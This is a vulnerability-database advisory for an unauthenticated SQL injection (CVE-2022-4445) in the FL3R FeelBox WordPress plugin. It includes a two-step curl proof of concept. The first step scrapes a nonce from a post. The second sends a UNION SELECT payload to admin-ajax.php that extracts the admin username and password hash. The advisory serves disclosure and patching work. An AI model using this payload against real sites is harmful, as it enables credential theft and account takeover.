Lucene search
CydaveWPVDB-ID:9BB6FDE0-1347-496B-BE03-3512E6B7E8F8HistoryJan 20, 2023 - 12:00 a.m.
FL3R FeelBox <= 8.1 - Unauthenticated SQLi
2023-01-2000:00:00
cydave
wpscan.com
6
sql injection
unauthenticated users
ajax action
wordpress
plugin vulnerability
EPSS
0.002
Percentile
58.2%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
PoC
1. Visit a blog post and extract the nonce from the source (search for βfeelboxAjaxβ, and extract the βtokenβ) curl -s βhttp://127.0.0.1:7777/?p=1β | grep βtokenβ 2. Invoke the following curl command, with the just obtained nonce (token), to disclose the first userβs username and password hash: curl βhttp://127.0.0.1:7777/wp-admin/admin-ajax.php?action=populate_postβ \ --data βtoken=&postID;=1 UNION ALL SELECT 1,1,CONCAT((SELECT user_login FROM wp_users),CHR(0x3a),(SELECT user_pass FROM wp_users)),1,1,1,1-- -β
Related
prion
prion
Sql injection
2023-02-13 15:15:00
nvd
nvd
CVE-2022-4445
2023-02-13 15:15:16
cvelist
cvelist
CVE-2022-4445 FL3R FeelBox <= 8.1 - Unauthenticated SQLi
2023-02-13 14:32:00
wpexploit
wpexploit
FL3R FeelBox <= 8.1 - Unauthenticated SQLi
2023-01-20 00:00:00
cve
cve
CVE-2022-4445
2023-02-13 15:15:16